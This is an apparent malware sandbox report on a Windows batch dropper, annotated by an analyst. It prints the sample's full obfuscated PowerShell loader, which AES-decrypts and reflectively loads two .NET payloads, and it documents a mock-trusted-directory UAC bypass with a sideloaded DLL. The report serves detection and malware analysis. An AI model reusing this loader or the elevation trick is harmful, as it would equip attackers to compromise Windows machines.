File name: | 3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat |
Full analysis: | https://app.any.run/tasks/a6791bad-7f35-4717-bdcc-0d9023639181 |
Verdict: | Malicious activity |
Analysis date: | May 24, 2024, 18:44:03 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines (58340), with CRLF line terminators — the 58,340-character line is where the payloads live: the embedded PowerShell loader (PID 6268) re-reads the .bat, looks for the line that begins with the 20-character marker `liHqZhZshpaeOVfbWRwH`, and treats everything after the marker as two `\`-separated encoded blobs |
MD5: | 81E3209CF09A8F2F59C94C3E8C20C475 |
SHA1: | 0E05DFA84C0F053AB8F2FC4682FB46E02440096F |
SHA256: | 3CB4D9BB4D3100FB7884A96C4C1CC4FFE4994C76E80626E2CA4894A01CB6DED2 |
SSDEEP: | 6144:xlN/X/N7ZeoXGyzjFk7ecPTja3UIhdcYGuukwEZrWAFhF7EP4:zNf1H2yzjFk7e6ToUmdcYFukwE5Wyh6w |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6208 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6216 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6268 | C:\WINDOWS\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PB3G/iXD5R10HYv1dkYf6wvlc6H16dkTeRAJtBSn4LU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LsLXFtmysUAoPLv6r6Ueaw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $puoml=New-Object System.IO.MemoryStream(,$param_var); $JwzSg=New-Object System.IO.MemoryStream; $swRQi=New-Object System.IO.Compression.GZipStream($puoml, [IO.Compression.CompressionMode]::Decompress); $swRQi.CopyTo($JwzSg); $swRQi.Dispose(); $puoml.Dispose(); $JwzSg.Dispose(); $JwzSg.ToArray();}function execute_function($param_var,$param2_var){ $OFffA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wgpwT=$OFffA.EntryPoint; $wgpwT.Invoke($null, $param2_var);}$VTLPA = 'C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat';$host.UI.RawUI.WindowTitle = $VTLPA;$Rstmc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VTLPA).Split([Environment]::NewLine);foreach ($lJDHS in $Rstmc) { if ($lJDHS.StartsWith('liHqZhZshpaeOVfbWRwH')) { $PDXzy=$lJDHS.Substring(20); break; }}$payloads_var=[string[]]$PDXzy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function 
$payload2_var (,[string[]] ('')); " | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules — Note: this cmd.exe only echoes the PowerShell loader shown in the CMD column; the powershell.exe child (PID 6276) is started without a -Command/-File argument, which is consistent with an `echo … | powershell` pipeline in the batch file. The loader's obfuscation is plain string reversal: `'gnirtS46esaBmorF'[-1..-16] -join ''` is FromBase64String, `'daoL'[-1..-4]` is Load, `'txeTllAdaeR'[-1..-11]` is ReadAllText. It reads the .bat itself, finds the line starting with `liHqZhZshpaeOVfbWRwH`, splits the remainder on `\`, undoes a character substitution (`#`→`/`, `@`→`A`), Base64-decodes, AES-CBC/PKCS7-decrypts with the hard-coded key `PB3G/iXD5R10HYv1dkYf6wvlc6H16dkTeRAJtBSn4LU=` and IV `LsLXFtmysUAoPLv6r6Ueaw==`, GZip-decompresses, and runs both results in memory via `[Reflection.Assembly]::Load` followed by `EntryPoint.Invoke` (payload 1 with `$null`, payload 2 with a single empty-string argv). Because key and IV are in the clear, both .NET payloads can be recovered offline from the sample without executing it.
| |||||||||||||||
6276 | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294967295 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules — Note: exit code 4294967295 is 0xFFFFFFFF (-1). The process runs with `-ep bypass -windowstyle hidden` and no script argument, so the loader is presumably fed over stdin from the echo in PID 6268. This is the 32-bit (SysWOW64) PowerShell that drops every file listed in the file table below, including the copies placed in the spoofed "C:\Windows \System32\" directory.
| |||||||||||||||
6480 | "C:\Windows \System32\ComputerDefaults.exe" "C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat" | C:\Windows \System32\ComputerDefaults.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Set Program Access and Computer Defaults Control Panel Exit code: 3221226540 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules — Note: the image path "C:\Windows \System32\ComputerDefaults.exe" has a space after "Windows": this is a directory the sample created (the file table shows PID 6276 writing ComputerDefaults.exe and MLANG.dll there), not the real System32. Exit code 3221226540 is 0xC000042C (STATUS_ELEVATION_REQUIRED), so this first MEDIUM-integrity launch did not elevate; the retry as PID 6536 did.
| |||||||||||||||
6536 | "C:\Windows \System32\ComputerDefaults.exe" "C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat" | C:\Windows \System32\ComputerDefaults.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Set Program Access and Computer Defaults Control Panel Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules — Note: this instance runs at HIGH integrity although its parent powershell.exe (PID 6276) is MEDIUM — this is the privilege-escalation point of the chain. The trailing-space path plus the MLANG.dll written beside the binary are consistent with the known mock-trusted-directory UAC bypass (a copy of an auto-elevating Microsoft binary with a sideloaded DLL in "C:\Windows \System32\"); confirm the DLL load from the Modules view before reporting it as such.
| |||||||||||||||
6640 | cmd.exe /c call SC.cmd | C:\Windows\SysWOW64\cmd.exe | — | ComputerDefaults.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules — Note: this elevated cmd.exe, spawned by the HIGH-integrity ComputerDefaults.exe (PID 6536), calls SC.cmd, but the file table records only C:\Users\admin\AppData\Local\Temp\SC.bat (a self-copy of the sample). The name mismatch together with exit code 1 suggests the elevated step may not have found its script in this run, so the intended elevated behavior is not observed on this page.
| |||||||||||||||
6676 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (6276) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (6276) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (6276) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (6276) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
Note: the four ZoneMap writes above (ProxyBypass, IntranetName, UNCAsIntranet, AutoDetect) by powershell.exe are commonly produced by .NET/WinINet proxy initialization when a PowerShell process starts; on their own they should not be read as attacker-controlled proxy tampering or persistence.
(PID) Process: | (6536) ComputerDefaults.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer |
Operation: | write | Name: | SlowContextMenuEntries |
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000 — Note: SlowContextMenuEntries appears to be ordinary Explorer shell state touched while the Control Panel applet ran; it is not a persistence mechanism and is not specific to this sample.
PID | Process | Filename | Type | |
---|---|---|---|---|
6276 | powershell.exe | C:\Users\admin\AppData\Local\Temp\SC.bat | text | |
MD5:81E3209CF09A8F2F59C94C3E8C20C475 | SHA256:3CB4D9BB4D3100FB7884A96C4C1CC4FFE4994C76E80626E2CA4894A01CB6DED2 — Note: identical hashes to the submitted sample, i.e. SC.bat is a self-copy of the .bat staged for the elevated stage (compare PID 6640, which calls SC.cmd). | |||
6276 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | binary | |
MD5:B305528CA5FDB3A3FB65D285F46E953C | SHA256:59FB207DC632634FA9C2061D5F597988AB5A1F2C0CB9388CC10C6C81FF1F2F94 | |||
6276 | powershell.exe | C:\Windows \System32\MLANG.dll | executable | |
MD5:134E4637B17B5F55AA8A0BE586A3CB4F | SHA256:C3B2425DB3762B1378CF9772A7E6FAF0DE19DD4AE8160AC7325F97FC249075D6 — Note: a DLL written into the spoofed "C:\Windows \System32\" directory next to ComputerDefaults.exe; presumably the sideloaded stage executed by the elevated copy (PID 6536). Its hashes are the IOC to pivot on; the DLL itself is not analyzed on this page. | |||
6276 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zoevfblc.zwv.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6276 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qo3kisnn.brm.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 — Note: the two __PSScriptPolicyTest_* files (identical hash) are generally written by PowerShell itself at startup to probe the AppLocker/WDAC script policy; they are a benign host artifact and should be excluded from IOCs. | |||
6276 | powershell.exe | C:\Windows \System32\ComputerDefaults.exe | executable | |
MD5:CFA65B13918526579371C138108A7DDB | SHA256:4C70FEA1C4F9B78955EB840C11C6C81F1D860485E090526A8E8176D98B1BE3D6 — Note: ComputerDefaults.exe copied by powershell.exe into "C:\Windows \System32\" (trailing space). The file is presumably an unmodified copy of the signed Microsoft binary — compare this hash with the one in the real C:\Windows\System32 — so the abuse lies in the spoofed directory and the adjacent MLANG.dll, not in the executable.
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2392 | svchost.exe | GET | 200 | 23.33.242.16:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
3688 | SIHClient.exe | GET | 200 | 23.33.242.16:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | unknown |
4680 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | — | — | unknown |
3052 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
2392 | svchost.exe | GET | 200 | 23.73.138.163:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | unknown |
3688 | SIHClient.exe | GET | 200 | 23.33.242.16:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | unknown |
Note: none of the HTTP requests above originate from the sample's process tree (PIDs 6208–6676); they are CRL/OCSP fetches by Windows services. No C2 or download traffic was recorded in this run, so the two in-memory .NET payloads either have no network stage or did not reach it here — decrypt them offline (key and IV are in the loader) rather than relying on this capture.
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | unknown |
— | — | 23.73.138.57:443 | — | Akamai International B.V. | GB | unknown |
— | — | 23.73.138.131:443 | — | Akamai International B.V. | GB | unknown |
4364 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
2392 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
1744 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
5140 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
2392 | svchost.exe | 23.73.138.163:80 | crl.microsoft.com | Akamai International B.V. | GB | unknown |
2392 | svchost.exe | 23.33.242.16:80 | www.microsoft.com | AKAMAI-AS | US | unknown |
5140 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
Note: likewise, no connection in this table is attributed to any PID from the sample's process tree; all entries are Windows telemetry/update and PKI endpoints.
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com | | whitelisted |
crl.microsoft.com | | whitelisted |
www.microsoft.com | | whitelisted |
ocsp.digicert.com | | whitelisted |
login.live.com | | whitelisted |
go.microsoft.com | | whitelisted |
slscr.update.microsoft.com | | whitelisted |
fe3cr.delivery.mp.microsoft.com | | whitelisted |
nexusrules.officeapps.live.com | | whitelisted |
client.wns.windows.com | | whitelisted |